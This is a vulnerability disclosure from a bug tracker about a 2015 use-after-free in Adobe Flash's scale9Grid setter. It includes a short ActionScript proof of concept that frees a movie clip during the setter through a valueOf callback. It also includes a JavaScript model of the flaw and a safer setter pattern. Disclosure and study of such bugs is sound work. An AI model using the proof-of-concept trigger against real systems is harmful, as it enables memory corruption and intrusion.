Status: Fixed
Closed: Aug 2015
Adobe Flash: Use-after-free in scale9Grid
Project Member Reported by natashenka@google.com, May 14 2015
There is a use-after-free issue if the scale9Grid setter is called on an object with a member that then frees the display item. This issue occurs for both MovieClips and Buttons; it needs to be fixed in both classes.

A PoC is as follows:

var n = { valueOf : func };   // converting o.x to a number runs func() inside the setter
var o = {x:n, y:0, width:10, height:10};

_global.mc = this;
var newmc:MovieClip = this.createEmptyMovieClip("mymc", 1);
mymc.scale9Grid = o;   // setter reads o.x -> valueOf -> func() while mymc is in use


function func() {
	trace("here");
	// place a text field at depth 1, the same depth as mymc, which frees the clip mid-setter
	var t = _global.mc.createTextField("test", 1, 1, 1, 2, 3);
	// remove it again, so the setter resumes with a dangling display item
	t.removeTextField();
	return 7;
}


A sample fla and swf are attached.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.

Attachments:
scale9.fla (4.7 KB)
scale9.swf (798 bytes)
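As an added illustration, not code from the report, from Adobe, or from the Flash runtime, the JavaScript below models the reentrancy hazard behind this bug: a property setter coerces caller-supplied values with valueOf, that callback destroys the very display object the setter is operating on, and the setter then writes through a pointer it captured before the callback. JavaScript is used because its valueOf coercion behaves like ActionScript 2's. The Heap, Stage, setScale9GridUnsafe and setScale9GridSafe names are invented for this model; the safe variant shows the mitigation pattern (finish every script-visible conversion before touching native state, then re-validate the target).

```javascript
// Toy allocator: records live in numbered slots; a freed slot is reused by the
// next allocation, which is what turns a stale pointer into a corrupting write.
class Heap {
  constructor() { this.slots = []; this.freeList = []; }
  alloc(record) {
    const slot = this.freeList.length ? this.freeList.pop() : this.slots.length;
    this.slots[slot] = record;
    return slot;
  }
  free(slot) { this.slots[slot] = null; this.freeList.push(slot); }
}

// Toy display list keyed by depth, like createEmptyMovieClip / createTextField.
// Placing a new object at an occupied depth destroys the old one (as in AS2).
class Stage {
  constructor() { this.heap = new Heap(); this.byDepth = new Map(); }
  place(kind, name, depth) {
    const old = this.byDepth.get(depth);
    if (old) this.destroy(old);
    const obj = { kind, name, depth, alive: true, slot: -1 };
    obj.slot = this.heap.alloc({ owner: name, grid: null });
    this.byDepth.set(depth, obj);
    return obj;
  }
  destroy(obj) {
    obj.alive = false;
    this.byDepth.delete(obj.depth);
    this.heap.free(obj.slot);
  }
}

// Unsafe setter (models the bug): captures the native slot first, then coerces the
// rectangle fields (running user valueOf code), then writes through the stale slot.
function setScale9GridUnsafe(stage, clip, rect) {
  const slot = clip.slot;                          // pointer captured before callbacks
  const grid = { x: Number(rect.x), y: Number(rect.y),
                 width: Number(rect.width), height: Number(rect.height) };
  const record = stage.heap.slots[slot];           // may be freed or reused by now
  if (record === null) throw new Error('write to freed slot');
  record.grid = grid;                              // would corrupt whoever reused the slot
  return record.owner;
}

// Safe setter: perform every script-visible conversion before touching native
// state, then re-check that the target is still alive and still at its depth.
function setScale9GridSafe(stage, clip, rect) {
  const grid = { x: Number(rect.x), y: Number(rect.y),
                 width: Number(rect.width), height: Number(rect.height) };
  if (!clip.alive || stage.byDepth.get(clip.depth) !== clip) {
    return null;                                   // target destroyed by a callback; refuse
  }
  stage.heap.slots[clip.slot].grid = grid;
  return stage.heap.slots[clip.slot].owner;
}

// Constructed scenario mirroring the report: valueOf on rect.x places a text field
// at the clip's depth (freeing the clip), then removes the text field again.
function runScenario(setter) {
  const stage = new Stage();
  const mc = stage.place('MovieClip', 'mymc', 1);
  const rect = {
    x: { valueOf() {
      const t = stage.place('TextField', 'test', 1);   // frees mymc
      stage.destroy(t);                                // frees the text field too
      return 7;
    } },
    y: 0, width: 10, height: 10,
  };
  try { return { result: setter(stage, mc, rect), error: null }; }
  catch (e) { return { result: undefined, error: e.message }; }
}

// Control: a plain rectangle with no callbacks must work with either setter.
function runBenign(setter) {
  const stage = new Stage();
  const mc = stage.place('MovieClip', 'mymc', 1);
  return setter(stage, mc, { x: 1, y: 0, width: 10, height: 10 });
}

console.log('unsafe:', runScenario(setScale9GridUnsafe));   // error: write to freed slot
console.log('safe:  ', runScenario(setScale9GridSafe));     // result: null, no error
```

The unsafe path reaches the write with a pointer to memory that the callback has already released; the safe path does the same coercions but only touches the display list after confirming the clip still exists, which is the shape of fix a setter like scale9Grid needs in both the MovieClip and Button classes.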
Project Member Comment 1 by natashenka@google.com, May 15 2015
Labels: -Reported-2015-May-13 Reported-2015-May-15
Project Member Comment 2 by natashenka@google.com, May 19 2015
This is PSIRT-3712. 
Project Member Comment 3 by natashenka@google.com, Aug 19 2015
Labels: -Restrict-View-Commit
Fixed in August bulletin
Project Member Comment 4 by scvitti@google.com, Aug 20 2015
Status: Fixed
Do we have a CVE-ID for this vulnerability? 